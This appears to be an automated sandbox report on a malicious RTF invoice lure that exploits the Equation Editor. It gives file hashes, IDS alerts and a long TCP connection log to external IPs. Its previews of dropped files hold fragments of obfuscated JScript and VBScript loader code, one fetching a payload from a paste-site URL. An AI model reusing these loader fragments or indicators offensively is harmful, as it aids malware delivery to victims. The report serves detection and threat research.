                                                                            Preview:.......... . . . . . . . .v.a.r. .e.n.i.g.m.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P...6...0.".).;..... . . . . . . . .v.a.r. .p.h.e.n.y.l.h.y.d.r.o.q.u.i.n.a.z.o.l.i.n.a. .=. .".L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.".;..... . . . . . . . .v.a.r. .s.a.b.a. .=. .".h.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.t.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.t.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.p.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.:.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P./.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P./.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.p.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.a.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.s.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.t.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.e.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P...L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.e.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.e.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P./.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.d.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P./.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.q.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.I.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.m.L.H.C.I.V.J.N.Q.U.K.A.B.W.T.P.t.L.H.C.I.V.J.N.Q.U.K.A.
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:ASCII text, with very long lines (1482), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):13340
                                                                            Entropy (8bit):5.324695026452157
                                                                            Encrypted:false
                                                                            SSDEEP:192:kegx5MRxQxc9xA1STgS05oXQYuDLaZ7YhahAODmvEUaHiWJHZERwl+fDW3CLM0FF:lqyRxQPSy5oeLMakrEGl+fDW3CLM4
                                                                            MD5:A493B3A76674E752564AD410AFED5875
                                                                            SHA1:9911A07078F2FF352BAE9C8D9401CB67817681A6
                                                                            SHA-256:5A546D1A9A105C9A6887E80B2698B98D5A8CCB38E1AC3C01BACD14A7A44BF902
                                                                            SHA-512:28E513300D4DD3637F11F9E1A273B101E2D48ABC6312C0AF4F9E119236003B4258AE44FAF8CBBB42DF7F8A7B680E6787233F556481CF41B63F6AAB5E89CFE7EC
                                                                            Malicious:true
                                                                            Preview:QNucChJgPmhIFJyWsi . crEaTeoBjEcT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("d2pTakNqcmppanBqVGouanNqSGpFakxqbGo="))).ExPandEnvIRoNmENtSTRInGs(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("JU1BTVBNUE1kTUFNVE1hTSVN"))) . & . pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("XGNnY0RjSGN4Y3NjcWN0Y0Rjb2NkY1JjbmNsY3RjSmNGY09jZGMuY2pjc2M=")), . juQbbnnShrcFRLRQMD . : . creatEobJECT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("V3dTd2N3cndJd1B3dHcud1N3SHdFd0x3bHc="))).RUn . crEaTeoBjEcT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("d2pTakNqcmppanBqVGouanNqSGpFakxqbGo="))).ExPandEnvIRoNmENtSTRInGs(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("JU1BTVBNUE1kTUFNVE1hTSVN"))) . & . pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("XGNnY0RjSGN4Y3NjcWN0Y0Rjb2NkY1JjbmNsY3RjSmNGY09jZGMuY2pjc2M=")) . : . Function juQbbnnShrcFRLRQMD() ..: ..juQbbnnShrcFRLRQMD = OqxvoIfKbSrLaezgFi..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, wylHMZFOLmBmUmmprr) ..: ..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, DRwZnTmnOFtbaxyiPX) ..: ..Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLR
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.4797606462020307
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                                            MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                                            SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                                            SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                                            SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                                            Malicious:false
                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                            File type:Rich Text Format data, version 1
                                                                            Entropy (8bit):3.4513660681902536
                                                                            TrID:
                                                                            • Rich Text Format (5005/1) 55.56%
                                                                            • Rich Text Format (4004/1) 44.44%
                                                                            File name:ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
                                                                            File size:62'723 bytes
                                                                            MD5:3585873ff559b339ce1ed181cf2c26c0
                                                                            SHA1:1189fc8c7e1fc8db4d89bbea5b72f7464c499119
                                                                            SHA256:072d452d181adbca486c143de3c41500bdccd335ec909af452360babdd040b92
                                                                            SHA512:d60275ecd0086e4757764327ebc1e75e0716debfaf18bbc8639f94b2f5422876b23705cd6d44a1ed1c5d30756826224f3c1629327f05aaaf32efde2705c9cafd
                                                                            SSDEEP:768:FIJjzP0sVRxanDg8FH/YIvptcR1xc+R+N:FIJk9nTd7UM+Rs
                                                                            TLSH:E453E09DC74F45A58F45A372532B8E4802BDB22EF34691B6B49C837037E9D3E05A64BC
                                                                            File Content Preview:{\rtf1..{\*\A1DHGDLzAkKdjqx9DTycS1mB6KMAEzWT9qJGXjllhXoUAQVbYNTVdwbqdG3XmMLDGZwsARrksdgRcDiJLCSAkKK5d0acRgX79F1PIs3iM2rjFiz5EyqsxgLilashLVVwSsR86ZkRonEgDTkgsjYwOZ3Uh1o4eLeVqV8Kj1LhtvjXf2NtwUSbFVsC5MKzWkMZyAzHKoFIFTEbkuIU3ITAd0DcadIl7E5uVtuH4QrzXSe9detHuBW
                                                                            Icon Hash:2764a3aaaeb7bdbf
                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                            00000210Ehno
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-07T16:50:53.184022+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1141.98.10.8880192.168.2.2249167TCP
                                                                            2024-11-07T16:51:07.228654+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.2249166TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 7, 2024 16:50:53.213387012 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:53.218542099 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:53.218626976 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:53.223331928 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:53.228348017 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070261002 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070374012 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070477009 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070501089 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070513964 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070519924 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070533991 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070534945 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070547104 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070552111 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070564032 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070565939 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070580959 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070581913 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070595026 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070600986 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070607901 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.070612907 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070626974 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.070641041 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.074702024 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.075596094 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.075650930 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.075687885 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.075721979 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.075787067 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.075820923 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:54.203418016 CET8049163141.98.10.88192.168.2.22
                                                                            Nov 7, 2024 16:50:54.203706026 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:55.220742941 CET4916380192.168.2.22141.98.10.88
                                                                            Nov 7, 2024 16:50:55.397414923 CET4916480192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:55.402424097 CET8049164188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:55.402496099 CET4916480192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:55.414586067 CET4916480192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:55.419404984 CET8049164188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.179899931 CET8049164188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.189821959 CET4916480192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.190445900 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.190498114 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.190561056 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.192059040 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.192070961 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.195487976 CET8049164188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.195538998 CET4916480192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.819811106 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.819957018 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.831012011 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:56.831044912 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.831402063 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:56.994867086 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.039334059 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.309058905 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.309123039 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.309154034 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.309179068 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.309202909 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.309345961 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.346519947 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.346585035 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.346616983 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.346638918 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.346651077 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.346662045 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.346689939 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.428210020 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.428297997 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.428332090 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.428350925 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.428370953 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.428412914 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.465327978 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465420961 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465478897 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.465501070 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465625048 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465661049 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465663910 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.465672016 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.465712070 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.547817945 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.547895908 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.547931910 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.547966003 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.547986031 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.548034906 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.584697008 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584789038 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584824085 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584851980 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.584855080 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584867001 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584902048 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.584909916 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584942102 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.584980011 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.584985971 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.666716099 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.666878939 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.666897058 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.667217016 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.667258978 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.667269945 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.682322025 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.682418108 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.703835964 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.703950882 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.704005003 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.704021931 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.704088926 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.704127073 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.704133987 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786133051 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786149979 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786189079 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.786207914 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786248922 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.786396980 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786406040 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786437988 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.786446095 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786493063 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:57.786525965 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.885634899 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:57.885715008 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:58.109563112 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:58.109606028 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:50:58.109625101 CET49165443192.168.2.22188.114.97.3
                                                                            Nov 7, 2024 16:50:58.109632015 CET44349165188.114.97.3192.168.2.22
                                                                            Nov 7, 2024 16:51:00.414810896 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:00.414863110 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:00.414901972 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:00.418529987 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:00.418540955 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.657797098 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.657864094 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:01.662817001 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:01.662825108 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.663155079 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.715924978 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:01.763329983 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.995078087 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.995105982 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:01.995146036 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:01.995157003 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.110443115 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.110455990 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.110621929 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.110650063 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.111551046 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.111560106 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.111584902 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.111608982 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.111629009 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.111690998 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.226079941 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.226097107 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.226128101 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.226193905 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.226193905 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.226300001 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.227019072 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.227030039 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.227055073 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.227073908 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.227089882 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.227142096 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.341341972 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.341356993 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.341541052 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.341562986 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.342216969 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.342227936 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.342286110 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.342295885 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.456685066 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.456729889 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.456767082 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.456785917 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.456845999 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.457359076 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.457371950 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.457398891 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.457429886 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.457438946 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.571995020 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572010994 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572036028 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572074890 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.572074890 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.572523117 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572532892 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572557926 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.572573900 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.572622061 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.687201023 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.687212944 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.687268972 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.687283039 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.688208103 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.688244104 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.688267946 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.688277960 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.688292980 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.802472115 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.802532911 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.802548885 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.802944899 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.802953959 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.803004980 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.803046942 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.803055048 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.803102970 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.917931080 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.917944908 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.917996883 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.918047905 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.918203115 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.918260098 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.918268919 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.918293953 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.918329000 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.918329000 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.919121027 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.919130087 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.919162035 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:02.919178963 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:02.943264961 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:03.057642937 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.057655096 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.057734013 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:03.057745934 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.057960033 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.057970047 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.058026075 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:03.058034897 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.058865070 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.058898926 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.058932066 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:03.058943033 CET44349166142.215.209.78192.168.2.22
                                                                            Nov 7, 2024 16:51:03.059020996 CET49166443192.168.2.22142.215.209.78
                                                                            Nov 7, 2024 16:51:03.173297882 CET44349166142.215.209.78192.168.2.22
